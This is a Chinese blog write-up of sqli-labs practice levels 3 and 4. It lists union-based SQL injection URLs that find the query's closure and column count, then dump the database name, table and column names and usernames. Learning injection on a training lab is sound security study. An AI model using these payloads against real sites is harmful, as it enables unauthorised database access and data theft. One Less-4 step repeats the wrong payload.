sqli-labs靶场3~4笔记

Less-3

1.测试是否存在注入点:

复制代码
http://sqli-labs/Less-3/?id=1'

可以看出是单引号+小括号闭合。

复制代码
http://sqli-labs/Less-3/?id=1')--+

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-3/?id=') union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-3/?id=') union select 1,2,database()--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-3/?id=') union select 1,2,group_concat(username) from security.users --+

Less-4

1.测试是否存在注入点:

是双引号+小括号闭合

2 爆列数(回显位)

复制代码
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

3.爆库

复制代码
#当前库
http://sqli-labs/Less-4/?id=") union select 1,2,3--+

4.爆表

复制代码
#security库中所有表
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' --+

5.爆列

复制代码
#爆security库中users表中所有列名
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' --+

6.爆字段

复制代码
#这里就看一下security库中users表中username列中的所有数据
http://sqli-labs/Less-4/?id=") union select 1,2,group_concat(username) from security.users --+

总结

前两关的差别也是注入类型的区别,Less-3是单引号+小括号型,Less-4是双引号+小括号型。

相关推荐
hjxu20166 小时前
【OpenClaw 龙虾养成笔记一】在远程服务器,使用Docker安装OpenClaw
服务器·笔记·docker
sinat_255487817 小时前
读者、作家 Java集合学习笔记
java·笔记·学习
observe1018 小时前
输入输出1
笔记
sanshanjianke11 小时前
AI辅助网文创作理论研究笔记(五):测试环境的搭建和一些问题的讨论
人工智能·笔记·ai写作
云边散步11 小时前
godot2D游戏教程系列二(18)
笔记·学习·游戏
C羊驼11 小时前
C语言:随机数
c语言·开发语言·经验分享·笔记·算法
風清掦11 小时前
【江科大STM32学习笔记-09】USART串口协议 - 9.1 STM32 USART串口外设
笔记·stm32·单片机·嵌入式硬件·学习
xian_wwq13 小时前
【学习笔记】看参识模型
笔记·学习
猹叉叉(学习版)13 小时前
【系统分析师_知识点整理】 3.数据库系统
数据库·笔记·软考·系统分析师
李子琪。13 小时前
攀山的人
经验分享·笔记·百度·新浪微博